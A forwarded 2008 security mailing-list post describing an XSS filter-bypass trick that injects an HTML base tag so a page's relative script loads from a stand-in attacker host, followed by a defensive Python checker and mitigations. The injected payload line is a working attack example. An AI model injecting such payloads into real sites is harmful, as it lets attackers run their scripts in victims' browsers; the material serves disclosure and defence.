The base tag can only be applied between <head> and </head>, so this method has certain limitations.
  ----- Original Message ----- 
  From: 大风 
  To: [email protected] 
  Sent: Wednesday, July 16, 2008 10:14 AM
  Subject: [Ph4nt0m] [zz]Nice little XSS trick


    From: Amit Klein <[EMAIL PROTECTED]>
    Subject: [WEB SECURITY] Nice little XSS trick
    Date: Tue, 15 Jul 2008 13:33:41 +0200

Hi list,
  Recently I've been thinking about bypassing anti-XSS filters, and a nice 
little trick occurred to me, which I haven't seen anywhere (e.g. it's not on 
RSnake's XSS cheat sheet - http://ha.ckers.org/xss.html; it does mention BASE, 
but not the trick I describe here). The idea is to use the HTML BASE tag to 
force loading of JS code from the attacker's host. Consider a page with an XSS 
vulnerability such as:

<html>...***XSS code may be embedded here***...<script src="/foo/bar.js"></script>...</html>

  Now, an attacker can inject <base href="http://www.attacker.tld/">, and next 
thing you know, the browser (IE, at least) loads the JS from 
http://www.attacker.tld/foo/bar.js... And the beauty is that there's no 
"explicit" JS code involved in the payload itself.

  Note that according to the HTML standard, BASE should be placed in the HEAD 
section (http://www.w3.org/TR/html401/struct/links.html#edef-BASE). This is 
indeed observed by FF 2, but not by IE (checked IE6).

Thanks,
-Amit

  [Ph4nt0m] 

  [Ph4nt0m Security Team]


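As an added illustration (not code from Amit's message or from the list), a small Python checker that resolves every relative script src in a page against any <base> tag it finds and reports those that would fetch the script from a different host than the page itself; it also records whether the base sat inside <head>, since the message notes that browsers differed on honouring a base placed elsewhere. The sample page, the victim URL and the function names are constructed for this example.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class BaseTagAuditor(HTMLParser):
    """Collect <base href> tags (noting whether each sits inside <head>)
    and every <script src>, so we can show where each script would be
    fetched from once the base takes effect."""

    def __init__(self):
        super().__init__()
        self.in_head = False
        self.bases = []        # list of (href, inside_head)
        self.script_srcs = []  # raw src attribute values

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "head":
            self.in_head = True
        elif tag == "base" and a.get("href"):
            self.bases.append((a["href"], self.in_head))
        elif tag == "script" and a.get("src"):
            self.script_srcs.append(a["src"])

    def handle_endtag(self, tag):
        if tag == "head":
            self.in_head = False


def audit_base_hijack(html, page_url):
    """Return one finding per (off-origin base, relative script) pair."""
    p = BaseTagAuditor()
    p.feed(html)
    page_host = urlsplit(page_url).netloc
    findings = []
    for href, inside_head in p.bases:
        base_abs = urljoin(page_url, href)
        if urlsplit(base_abs).netloc == page_host:
            continue  # base still points at our own host: not a hijack
        for src in p.script_srcs:
            u = urlsplit(src)
            if u.scheme or u.netloc:
                continue  # absolute / protocol-relative src ignores <base>
            findings.append({"base": base_abs, "base_in_head": inside_head,
                             "script": src, "resolved": urljoin(base_abs, src)})
    return findings


# Constructed sample: the vulnerable page shape from the message, with an
# injected <base> landing in the body rather than in <head>.
SAMPLE = ('<html><head><title>t</title></head><body>'
          '<base href="http://www.attacker.tld/">'
          '<script src="/foo/bar.js"></script></body></html>')
```

Absolute script URLs are unaffected, which is why the check skips them; on the server side the same effect is achieved by emitting absolute script URLs or setting a Content-Security-Policy `base-uri` directive.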
--~--~---------~--~----~------------~-------~--~----~
 To post to this mailing list, send mail to [email protected]
 To unsubscribe, send mail to [EMAIL PROTECTED]
-~----------~----~----~----~------~----~------~--~---